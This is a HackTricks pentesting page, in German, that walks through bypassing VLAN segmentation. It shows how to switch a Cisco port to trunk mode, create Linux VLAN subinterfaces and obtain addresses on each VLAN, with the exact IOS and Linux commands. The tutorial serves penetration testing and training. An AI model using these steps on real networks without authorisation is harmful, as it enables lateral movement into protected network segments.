Lateral VLAN Segmentation Bypass

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Wenn direkter Zugriff auf einen Switch verfügbar ist, kann die VLAN-Segmentierung umgangen werden. Dies beinhaltet die Neukonfiguration des angeschlossenen Ports in den Trunk-Modus, das Einrichten virtueller Schnittstellen für Ziel-VLANs und das Festlegen von IP-Adressen, entweder dynamisch (DHCP) oder statisch, je nach Szenario (für weitere Details siehe https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Zunächst ist die Identifizierung des spezifischen angeschlossenen Ports erforderlich. Dies kann typischerweise durch CDP-Nachrichten oder durch die Suche nach dem Port über die include-Maske erreicht werden.

Wenn CDP nicht funktioniert, kann die Portidentifizierung versucht werden, indem nach der MAC-Adresse gesucht wird:

SW1(config)# show mac address-table | include 0050.0000.0500

Vor dem Wechsel in den Trunk-Modus sollte eine Liste der vorhandenen VLANs erstellt und deren Identifikatoren bestimmt werden. Diese Identifikatoren werden dann der Schnittstelle zugewiesen, um den Zugriff auf verschiedene VLANs über den Trunk zu ermöglichen. Der verwendete Port ist beispielsweise mit VLAN 10 verbunden.

SW1# show vlan brief

Der Übergang in den Trunk-Modus erfordert das Betreten des Schnittstellenkonfigurationsmodus:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Der Wechsel in den Trunk-Modus wird vorübergehend die Konnektivität stören, aber dies kann anschließend wiederhergestellt werden.

Virtuelle Schnittstellen werden dann erstellt, VLAN-IDs zugewiesen und aktiviert:

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

Anschließend wird eine Adressanforderung über DHCP gestellt. Alternativ können in Fällen, in denen DHCP nicht möglich ist, Adressen manuell konfiguriert werden:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Beispiel für das manuelle Festlegen einer statischen IP-Adresse auf einer Schnittstelle (VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

Die Konnektivität wird getestet, indem ICMP-Anfragen an die Standard-Gateways für die VLANs 10, 20, 50 und 60 initiiert werden.

Letztendlich ermöglicht dieser Prozess das Umgehen der VLAN-Segmentierung, wodurch ungehinderter Zugriff auf jedes VLAN-Netzwerk erleichtert wird und die Grundlage für nachfolgende Aktionen geschaffen wird.

References

https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousIDS and IPS Evasion NextNetwork Protocols Explained (ESP)

Last updated 4 months ago